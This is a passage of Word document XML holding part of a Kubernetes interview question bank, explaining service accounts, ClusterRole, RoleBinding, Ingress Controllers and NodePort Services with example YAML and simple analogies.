        <w:t>Passwords/certs/OIDC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RBAC integration</w:t>
        <w:br/>
        <w:t>Service Accounts are used with RBAC (Role-Based Access Control):</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Role defines permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RoleBinding assigns permissions to a service account</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example RBAC binding</w:t>
        <w:br/>
        <w:t>kind: RoleBinding</w:t>
        <w:br/>
        <w:t>subjects:</w:t>
        <w:br/>
        <w:t>- kind: ServiceAccount</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-sa</w:t>
        <w:br/>
        <w:t>roleRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  kind: Role</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: pod-reader</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid using default service account in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Give least privilege access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rotate tokens when needed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Disable auto-mounting token if not required:</w:t>
        <w:br/>
        <w:t>automountServiceAccountToken: false</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a company:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Users = employees (humans)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service Accounts = system robots / software agents</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Permissions = what each is allowed to access</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Service Account in Kubernetes is an identity used by applications and system components running in pods to authenticate with the Kubernetes API server and access cluster resources securely through RBAC-based permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q266. Explain ClusterRole.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A ClusterRole in Kubernetes is a type of RBAC (Role-Based Access Control) object that defines permissions at the cluster level, not limited to a single namespace.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A ClusterRole defines what actions are allowed on which resources across the entire cluster.</w:t>
        <w:br/>
        <w:t>It is used when permissions must apply globally, not just inside one namespace.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why ClusterRole is needed</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Some resources are namespace-scoped (pods, services)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Some resources are cluster-scoped (nodes, PVs, namespaces)</w:t>
        <w:br/>
        <w:t>ClusterRole is required when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need access across multiple namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need access to cluster-wide resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You want reusable roles for multiple namespaces</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What ClusterRole can do</w:t>
        <w:br/>
        <w:t>1. Namespace-scoped resources (across all namespaces)</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Read pods in all namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * List services cluster-wide</w:t>
        <w:br/>
        <w:t>2. Cluster-scoped resources</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PersistentVolumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CRDs (Custom Resource Definitions)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example ClusterRole YAML</w:t>
        <w:br/>
        <w:t>kind: ClusterRole</w:t>
        <w:br/>
        <w:t>apiVersion: rbac.authorization.k8s.io/v1</w:t>
        <w:br/>
        <w:t>rules:</w:t>
        <w:br/>
        <w:t>- apiGroups: [""]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resources: ["pods"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  verbs: ["get", "list", "watch"]</w:t>
        <w:br/>
        <w:t>This allows reading pods in all namespaces.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it is used</w:t>
        <w:br/>
        <w:t>A ClusterRole does nothing by itself.</w:t>
        <w:br/>
        <w:t>It must be attached using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ClusterRoleBinding (cluster-wide access)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RoleBinding (namespace-specific use of ClusterRole)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Binding examples</w:t>
        <w:br/>
        <w:t>1. Cluster-wide binding</w:t>
        <w:br/>
        <w:t>kind: ClusterRoleBinding</w:t>
        <w:br/>
        <w:t>roleRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  kind: ClusterRole</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: pod-reader</w:t>
        <w:br/>
        <w:t>subjects:</w:t>
        <w:br/>
        <w:t>- kind: ServiceAccount</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-sa</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Namespace-limited use of ClusterRole</w:t>
        <w:br/>
        <w:t>You can bind a ClusterRole to a RoleBinding to restrict scope to a namespace.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ClusterRole vs Role</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ClusterRole</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Single namespace</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Entire cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace + cluster resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Binding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RoleBinding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RoleBinding / ClusterRoleBinding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring tools (Prometheus scraping all namespaces)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logging agents (Fluentd, Filebeat)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster administration tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Controllers managing cluster resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CI/CD systems deploying across namespaces</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a company:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Role = permissions inside one department</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ClusterRole = permissions across all departments + building-wide access</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key concept</w:t>
        <w:br/>
        <w:t>ClusterRole defines permissions; bindings decide where those permissions apply.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A ClusterRole in Kubernetes is an RBAC object that defines permissions for accessing resources across the entire cluster, including both namespace-scoped resources in all namespaces and cluster-scoped resources, and it can be attached to users or service accounts using ClusterRoleBindings or RoleBindings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q267. What is RoleBinding?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A RoleBinding in Kubernetes is an RBAC object that grants permissions defined in a Role (or ClusterRole) to a user, group, or ServiceAccount within a specific namespace.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>RoleBinding connects who (subject) with what permissions (Role) inside a namespace.</w:t>
        <w:br/>
        <w:t>It does not define permissions itself—it only assigns them.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why RoleBinding is needed</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Roles define permissions (what actions are allowed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * But Roles alone are not effective</w:t>
        <w:br/>
        <w:t>RoleBinding is required to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Assign those permissions to users or workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Control access inside a namespace</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How RoleBinding works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. A Role defines permissions (e.g., read pods)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. RoleBinding attaches that Role to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * User</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Group</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ServiceAccount</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Subject gains permissions inside that namespace</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example RoleBinding YAML</w:t>
        <w:br/>
        <w:t>kind: RoleBinding</w:t>
        <w:br/>
        <w:t>apiVersion: rbac.authorization.k8s.io/v1</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: read-pods-binding</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: dev</w:t>
        <w:br/>
        <w:t>subjects:</w:t>
        <w:br/>
        <w:t>- kind: ServiceAccount</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-sa</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: dev</w:t>
        <w:br/>
        <w:t>roleRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  kind: Role</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: pod-reader</w:t>
        <w:br/>
        <w:t xml:space="preserve">  apiGroup: rbac.authorization.k8s.io</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What this means</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ServiceAccount app-sa</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gets permissions from Role pod-reader</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only inside the dev namespace</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RoleBinding vs ClusterRoleBinding</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RoleBinding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ClusterRoleBinding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace-level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster-wide</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Binds to</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role or ClusterRole</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ClusterRole only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full cluster access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concept</w:t>
        <w:br/>
        <w:t>RoleBinding can bind:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A Role (namespace-local permissions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A ClusterRole (but still limited to a namespace when using RoleBinding)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: Using ClusterRole with RoleBinding</w:t>
        <w:br/>
        <w:t>You can reuse a ClusterRole but limit it to one namespace:</w:t>
        <w:br/>
        <w:t>roleRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  kind: ClusterRole</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: view</w:t>
        <w:br/>
        <w:t>This gives read-only access only in that namespace.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Give developers access only to their namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Allow CI/CD pipelines to deploy in a specific environment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grant read-only access to monitoring tools per namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Control service account permissions for applications</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Role = job description (what can be done)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RoleBinding = assigning that job to a specific person in one department</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key point</w:t>
        <w:br/>
        <w:t>RoleBinding = “assignment layer” that connects identities to permissions within a namespace.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A RoleBinding in Kubernetes is an RBAC resource that grants the permissions defined in a Role or ClusterRole to users, groups, or service accounts within a specific namespace, enabling controlled and namespace-scoped access to Kubernetes resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q268. What is ingress controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An Ingress Controller in Kubernetes is the actual component that processes Ingress rules and routes external HTTP/HTTPS traffic to services inside the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Ingress (resource) = rules</w:t>
        <w:br/>
        <w:t>Ingress Controller = engine that makes those rules work</w:t>
        <w:br/>
        <w:t>Without an Ingress Controller, an Ingress object does nothing.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is needed</w:t>
        <w:br/>
        <w:t>Kubernetes only defines what should happen (Ingress rules), but not how to implement it.</w:t>
        <w:br/>
        <w:t>So the Ingress Controller:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Watches Ingress resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reads routing rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configures a proxy/load balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Routes traffic to backend Services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it does</w:t>
        <w:br/>
        <w:t>1. Watches Ingress objects</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously monitors changes in Ingress resources via API server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Configures routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Translates rules into actual network configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses a reverse proxy like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NGINX</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HAProxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traefik</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS ALB</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Handles external traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accepts HTTP/HTTPS requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Routes them based on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Host (domain)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Path (/api, /app)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Forwards to correct Kubernetes Service</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Manages TLS</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles SSL/TLS termination</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages certificates (manual or via cert-manager)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. User creates Ingress resource</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Ingress Controller detects it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Controller configures routing rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. External request arrives</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Controller routes request → Service → Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example architecture</w:t>
        <w:br/>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Ingress Controller (NGINX / ALB)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Kubernetes Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Ingress Controllers</w:t>
        <w:br/>
        <w:t>1. NGINX Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Most widely used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Open source</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Flexible routing</w:t>
        <w:br/>
        <w:t>2. Traefik</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Built-in dashboard</w:t>
        <w:br/>
        <w:t>3. HAProxy Ingress</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High performance</w:t>
        <w:br/>
        <w:t>4. Cloud-native controllers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS ALB Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GKE Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Azure Application Gateway</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing HTTP/HTTPS traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Path-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Host-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SSL termination</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic management and rewrites</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ingress vs Ingress Controller</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ingress</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ingress Controller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes resource</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Running component/pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Defines rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Implements rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Function</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Declarative config</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Actual traffic handling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress = traffic rules written on paper</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress Controller = traffic police enforcing those rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key point</w:t>
        <w:br/>
        <w:t>Ingress Controller is the actual reverse proxy system that reads Ingress definitions and routes external traffic to Kubernetes services.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>An Ingress Controller in Kubernetes is a specialized component that watches Ingress resources and implements their routing rules by configuring a reverse proxy or load balancer to manage external HTTP/HTTPS traffic into services within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q269. Explain NodePort service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A NodePort Service in Kubernetes is a type of Service that exposes an application on a static port on each node’s IP address, allowing external traffic to reach pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>NodePort opens a specific port on every node, and traffic sent to that port is forwarded to the service.</w:t>
        <w:br/>
        <w:t>So you can access your application using:</w:t>
        <w:br/>
        <w:t>&lt;NodeIP&gt;:&lt;NodePort&gt;</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why NodePort is used</w:t>
        <w:br/>
        <w:t>It is used for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simple external access to services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Testing and development environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Basic load distribution across nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Kubernetes allocates a port (30000–32767 range)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. This port is opened on every node in the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Traffic to that port is forwarded to the Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Service routes traffic to Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>User → NodeIP:NodePort → Service → Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Service YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Service</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app-service</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type: NodePort</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    app: my-app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - port: 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">    targetPort: 8080</w:t>
        <w:br/>
        <w:t xml:space="preserve">    nodePort: 30007</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key fields</w:t>
        <w:br/>
        <w:t>1. port</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service port inside cluster</w:t>
        <w:br/>
        <w:t>2. targetPort</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Port on the container/pod</w:t>
        <w:br/>
        <w:t>3. nodePort</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * External port exposed on each node</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example access</w:t>
        <w:br/>
        <w:t>If node IP is:</w:t>
        <w:br/>
        <w:t>192.168.1.10</w:t>
        <w:br/>
        <w:t>Then access app via:</w:t>
        <w:br/>
        <w:t>http://192.168.1.10:30007</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exposes service on every node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works without Ingress or LoadBalancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses ports in range 30000–32767</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simple but not production-friendly for large systems</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>NodePort vs other Services</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>NodePort</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ClusterIP</w:t>
        <w:br/>
        <w:tab/>
        <w:t>LoadBalancer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>External access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Port exposure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Static node port</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Internal only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud LB</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Dev/testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Internal communication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exposes every node (security concern)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fixed port range</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not scalable for large production systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No advanced routing (unlike Ingress)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a building:</w:t>
        <w:br/>
